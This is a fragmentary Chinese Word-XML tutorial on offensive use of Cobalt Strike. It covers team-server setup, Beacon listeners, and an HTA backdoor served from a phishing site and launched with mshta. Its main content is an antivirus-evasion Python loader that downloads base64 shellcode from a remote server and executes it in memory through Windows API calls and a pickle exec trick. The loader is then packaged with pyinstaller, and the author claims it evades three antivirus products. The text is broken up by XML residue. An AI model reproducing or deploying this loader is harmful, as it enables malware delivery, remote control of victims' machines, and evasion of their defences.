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Strategic Cyber 责任有限公司发行了适用于 Windows、Linux 和 MacOS X 的 Cobalt Strike 软件包。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要安装 Cobalt Strike，只需将其存档解压到你的操作系统上。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**</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="80" w:beforeAutospacing="0" w:after="160" w:afterAutospacing="0" w:line="300" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F4F4F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr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FFFFFF"/>
        </w:rPr>
        <w:t>一、安装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**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1、系统要求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Cobalt Strike 要求 </w:t>
      </w:r>
      <w:r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>Oracle Java 1.8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，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>Oracle Java 11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, 或 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4"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>OpenJDK 11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如果你的系统上装有防病毒产品，请确保在安装 Cobalt Strike 前将其禁用。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Cobalt Strike 发行套件包含 Cobalt Strike 启动器、支持文件和更新程序。它不包含 Cobalt Strike 程序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本身。你必须运行更新程序才能下载 Cobalt Strike 产品。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更新流程（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欢迎尝试，但是 key 不再有效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./update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2、服务器部署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Cobalt Strike 分为客户端组件和服务器组件。服务器组件，也就是团队服务器，是 Beacon payload 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控制器，也是 Cobalt Strike 社会工程功能的托管主机。团队服务器还存储由 Cobalt Strike 收集的数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据，并管理日志记录。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Cobalt Strike 团队服务器必须在受支持的 Linux 系统上运行。要启动一个 Cobalt Strike 团队服务器。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使用 Cobalt Strike Linux 安装包中的 teamserver 脚本文件。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./teamserver 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139.9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.223.157   password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团队服务器的启动命令包含两个必填的参数和两个选填的参数。第一个必选参数是团队服务器的外部可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达 IP 地址。Cobalt Strike 使用这个值作为它的功能使用的默认主机地址。第二个必选参数是密码，你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的团队成员将使用此密码从自己 Cobalt Strike 客户端去连接至 Cobalt Strike 团队服务器。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如下图成功启动CS服务端：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839700" cy="1266825"/>
            <wp:effectExtent l="0" t="0" r="0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想修改默认端口直接修改teamserver文件就可以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这里要注意的是云服务器需要安全组开启一下对应端口。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3、客户端链接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host：cs服务端地址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port：端口默认不变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user：用户名随便写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Password：123（服务端启动时输入的密码）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之后点击Connect即可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0639425" cy="5629275"/>
            <wp:effectExtent l="0" t="0" r="317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7887950" cy="8239125"/>
            <wp:effectExtent l="0" t="0" r="6350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0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**</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="80" w:beforeAutospacing="0" w:after="160" w:afterAutospacing="0" w:line="300" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F4F4F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr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FFFFFF"/>
        </w:rPr>
        <w:t>二、尝试获取第一个shell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**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1、CS Listener：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监听器：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windows/beacon_dns/reverse_dns_txt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windows/beacon_dns/reverse_http x86/x64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windows/beacon_http/reverse_http x86/x64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windows/beacon_https/reverse_https x86/x64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windows/beacon_smb/bind_pipe x86/x64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windows/foreign/reverse_dns_txt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windows/foreign/reverse_http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windows/foreign/reverse_https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windows/foreign/reverse_tcp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Beacon为内置的Listener，即在目标主机执行相应的payload，获取shell到CS上；其中包含DNS、HTTP、SMB。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Foreign为外部结合的Listener，常用于MSF的结合，例如获取meterpreter到MSF上。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创建Beacon Listener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288000" cy="97155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71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2、后门生成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这里选择的HTML Application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选择Listener与生成的方法，有powershell、vba以及exe三种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8134350" cy="3962400"/>
            <wp:effectExtent l="0" t="0" r="635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选择powershell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这里用windows神器hta shell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467475" cy="426720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将hta文件放置在钓鱼的web服务器上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本机powershell运行 mshta http://xxxx.xxx.xxx/1.hta</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="80" w:beforeAutospacing="0" w:after="160" w:afterAutospacing="0" w:line="300" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F4F4F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr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FFFFFF"/>
        </w:rPr>
        <w:t>三、CS结合python3混淆shellcode制作免杀脚本</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="80" w:beforeAutospacing="0" w:after="160" w:afterAutospacing="0" w:line="280" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F4F4F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr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</w:rPr>
        <w:t>1.Shellcode介绍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shell代码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:是Payload的一种，由于其建立正向/反向shell而得名。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="80" w:beforeAutospacing="0" w:after="160" w:afterAutospacing="0" w:line="280" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F4F4F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr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</w:rPr>
        <w:t>2.CS免杀操作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CS生成木马已经被各大杀毒软件加入病毒库，很容易被查杀，所以我们需进行一些免杀操作来绕过杀毒软件。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0x01原理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shellcode和加载器(pyminifier混淆后)经base64编码后，放远程服务器备用，然后目标主机远程下载两次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0x02 shellcode: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1、先用cs生成python shellcode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把shellcode进行BS64加密放在shellcode.txt里面并存放到服务器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"\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x"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3296900" cy="707707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0x03 loader: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修改加载器的服务器地址后进行一次BS64加密，然后把代码放在loader.txt里面并存放到服务器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14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="282C34"/>
        </w:rPr>
        <w:t>import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ctypes,urllib.request,codecs,base64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shellcode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urllib.request.urlopen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'http://139.9.223.157:8088/shellcode.txt'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.read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shellcode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shellcode.strip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shellcode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base64.b64decode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shellcode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codecs.escape_decode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)[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shellcode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bytearray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ctypes.windll.kernel32.VirtualAlloc.restype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ctypes.c_uint64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ptr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ctypes.windll.kernel32.VirtualAlloc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0x3000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0x40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buf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ctypes.c_char * len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.from_buffer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ctypes.windll.kernel32.RtlMoveMemory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ctypes.c_uint64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ptr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buf,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len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shellcode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handle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ctypes.windll.kernel32.CreateThread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ctypes.c_uint64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ptr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ctypes.pointer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C379"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="282C34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ctypes.windll.kernel32.WaitForSingleObject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handle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,ctypes.c_int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-1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0x04 主程序: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py_ma.py,最终在目标上执行的exe文件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修改服务器地址后使用pyinstaller打包成exe可执行文件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Fonts w:hint="default" w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:eastAsia="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:i/>
          <w:iCs/>
          <w:caps w:val="0"/>
          <w:color w:val="5C6370"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="282C34"/>
        </w:rPr>
        <w:t>#-*- coding : utf-8-*-#coding:unicode_escape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14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="282C34"/>
        </w:rPr>
        <w:t>import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pickle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14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="282C34"/>
        </w:rPr>
        <w:t>import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ctypes,urllib.request,codecs,base64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sectr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urllib.request.urlopen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'http://139.9.223.157:8088/loader.txt'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.read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()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5C6370"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="282C34"/>
        </w:rPr>
        <w:t>#sectr=str(sectr,'UTF-8')#print(sectr)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sectr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base64.b64decode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sectr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.decode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"utf-8"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class A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object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def __reduce__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self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return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exec,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sectr,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ret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pickle.dumps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A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())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ret_base64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base64.b64encode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ret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ret_decode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69900"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="282C34"/>
        </w:rPr>
        <w:t>=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 xml:space="preserve"> base64.b64decode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ret_base64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pickle.loads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(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ret_decode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4"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="282C34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0x05 打包:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="252" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0" w:line="22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4"/>
          <w:szCs w:val="1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4"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="282C34"/>
        </w:rPr>
        <w:t>pyinstaller -F -w pa_ma.py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160" w:afterAutospacing="0" w:line="260" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F4F4F"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9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0x06 测试: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loader和shellcode放到远程服务器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本地运行主程序成功上线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经测试360、电脑管家、火绒均实现免杀（2022-06-15）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1458575" cy="7410450"/>
            <wp:effectExtent l="0" t="0" r="9525" b="635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 w:line="260" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0"/>
        <w:rPr>
          <w:color w:val="4D4D4D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288000" cy="47625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ZTJkNTcwM2YwOTMyYTZhMTQ1OTRlZGI1OTEzOWYifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="1CC733DB"/>
    <w:rsid w:val="1DC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1058</Words>
  <Characters>3383</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>3572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2022-06-15T02:34:00Z</dcterms:created>
  <dc:creator>15093</dc:creator>
  <cp:lastModifiedBy>那酒不要留</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-06-15T02:39:05Z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08AEA0BF63D849499E618F5A3651D906</vt:lpwstr>
  </property>
</Properties>
</file>